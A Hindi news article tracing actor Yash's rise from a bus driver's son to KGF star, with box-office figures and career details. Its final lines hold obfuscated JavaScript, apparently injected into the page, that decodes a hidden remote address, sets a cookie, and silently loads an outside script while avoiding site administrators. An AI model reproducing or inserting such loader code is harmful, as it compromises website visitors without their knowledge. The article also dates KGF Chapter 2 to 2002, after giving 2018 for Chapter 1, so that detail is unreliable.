News Indiaa Reporter:- Jasa Ram
South Biggest Hero: साउथ का एक हीरो ऐसा है जिसकी कहानी फर्श से अर्श तक की है. महज 39 साल के इस एक्टर ने ऐसा रुतबा हासिल कर लिया है कि एक्टिंग और एक्शन फिल्मों में सबका बाप साबित हो रहा है. यहां तक कि इसकी एक-एक फिल्म बॉक्स ऑफिस पर इतने नोट छापती है कि इसके सामने बड़े से बड़ा स्टार कांपने लगता है. खास बात है कि इस स्टार के पिता कर्नाटक स्टेट ट्रांसपोर्ट बस सर्विस में आज भी ड्राइवर का काम करते हैं. चलिए आपको इस स्टार के बारे में बताते हैं.

ये एक्टर कोई और नहीं साउथ का सबसे जबरदस्त एक्शन हीरो यश है. जब यश महज 16 साल का था अपने पेरेंट्स को एक्टिंग करने के सपने के बारे में बताया. इसके बाद किसी तरह से एक कन्नड़ फिल्म में बतौर असिस्टेंट डायरेक्टर काम किया. लेकिन 2 दिन काम करने के बाद ही फिल्म का डंबा बंद हो गया.
यश ने अपने एक इंटरव्यू में बताया है कि जब वो पहली बार बेंगलुरु आए थे तो काफी घबराए हुए थे. ऐसा इसलिए क्योंकि शहर काफी बड़ा था और वो पहली बार इस तरह से आए थे. लेकिन तभी उन्होंने अपने इस डर को कंट्रोल किया और खुद पर हावी नहीं होने दिया.
यश की पॉकेट में उस वक्त सिर्फ 300 रुपये थे. उन्हें लगा कि अगर वापस घर जाएंगे तो पेरेंट्स फिर दोबारा आने नहीं देंगे. तभी यश ने वहां पर रुकने का फैसला किया और बेनाका ड्रामा ट्रूप को ज्वाइन कर लिया. साथ ही गुजारा चलाने के लिए स्टेज के बैक साइड का काम करने लगे. जिसमें लोगों को चाय सर्व करना था. इस काम के लिए एक्टर को रोजाना के 50 रुपये मिल जाते थे. थिएटर में एक्टिंग की बारीकियां सीखने के साथ ही यश ने कॉलेज में भी दाखिला ले लिया.

यश को पहला एक्टिंग ब्रेक टीवी सीरियल ‘नंदा गोकुल’ में में मिला. जहां पर उनकी उस हसीना से मुलाकात हुई जो अब उनकी वाइफ हैं यानी कि राधिका पंडित. इसके बाद 2007 में यश ने फिल्मों में बतौर सपोर्टिंग एक्टर के चौर पर एंट्री ली. ये मूवी Jambada Hudugi थी. इसके बाद रोमांटिक कॉमेडी फिल्म Modalasala में काम किया. लेकिन Kirataka फिल्म की सक्सें ने उन्हें पहचान दिया दी. इसके बाद की हिट फिल्में दी.
इसके बाद यश के हाथ वो फिल्म लगी जिसने उन्हें साउथ फिल्म इंडस्ट्री का बादशाह बना दिया. ये फिल्म थी 2018 में आई ‘केजीएफ चैप्टर 1’. इस फिल्म में यश ने रॉकी का ऐसा रोल निभाया कि इस एक्शन थ्रिलर फिल्म ने उन्हें सबसे बड़ा स्टार बना दिया. इस कन्नड़ फिल्म हिंदी और कई भाषाओं में भी डब हुई है. रिलीज होते ही सारे रिकॉर्ड तोड़ दिए थे. यहां तक कि कन्नड़ की हाईएस्ट ग्रॉसिंग फिल्म 250 करोड़ के कलेक्शन के साथ बन गई थी.

खास बात है कि रॉकी ने अपने ही इस रिकॉर्ड को कुचल दिया. 2002 में आई ‘केजीएफ चैप्टर 2’ फिल्म ने रिकॉर्ड तोड़ 1250 करोड़ का कलेक्शन किया था. ये रिकॉर्ड आज तक कोई नहीं तोड़ पाया. यहां तकि ये इकलौती ऐसी कन्नड़ फिलम है जिसने 1000 करोड़ से ज्यादा का कलेक्शन किया है. वहीं, रिपोर्ट्स की मानें तो यश नितेश तिवारी की रामायण मूवी में रावण का रोल निभाएंगे. इस निगेटिव रोल के लिए 200 करोड़ फीस चार्ज करने की खबरें हैं.
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
